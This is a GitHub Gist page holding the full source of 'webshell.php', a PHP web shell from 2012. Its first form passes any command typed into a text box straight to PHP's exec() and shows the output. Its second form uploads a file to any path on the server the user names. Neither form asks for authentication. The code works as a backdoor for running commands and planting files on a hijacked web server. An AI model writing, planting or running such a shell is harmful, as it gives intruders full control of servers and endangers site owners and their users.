Skip to content

Instantly share code, notes, and snippets.

@ricardomaia
Created November 20, 2022 15:23
Show Gist options
  • Save ricardomaia/f57204019bf64715ed6b1f587a7428d7 to your computer and use it in GitHub Desktop.
Save ricardomaia/f57204019bf64715ed6b1f587a7428d7 to your computer and use it in GitHub Desktop.
webshell.php
<!-- Project Name : PHP Web Shell -->
<!-- Version : 0.01 -->
<!-- First development date : 2012/07/31 -->
<!-- This Version development date : 2012/07/31 -->
<!-- language : html, css, javascript, php -->
<!-- Developer : majorPE -->
<!-- Web site : http://blog.naver.com/xornrbboy -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
<title>PHP Web Shell Ver 0.01 by majorPE</title>
<script type="text/javascript">
function FocusIn(obj)
{
if(obj.value == obj.defaultValue)
obj.value = '';
}
function FocusOut(obj)
{
if(obj.value == '')
obj.value = obj.defaultValue;
}
</script>
</head>
<body>
<b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br>
HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>
REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>
<br>
<form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)">
<input type="submit" name="exec" value="exec">
</form>
<?php
if(isset($_POST['exec']))
{
exec($_POST['cmd'],$result);
echo '----------------- < OutPut > -----------------';
echo '<pre>';
foreach($result as $print)
{
$print = str_replace('<','&lt;',$print);
echo $print . '<br>';
}
echo '</pre>';
}
else echo '<br>';
?>
<form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="file" name="file">
<input type="submit" name="upload" value="upload"><br>
<input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)">
</form>
<?php
if(isset($_POST['upload']))
{
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
if($check == TRUE)
echo '<pre>The file was uploaded successfully!!</pre>';
else
echo '<pre>File Upload was failed...</pre>';
}
?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment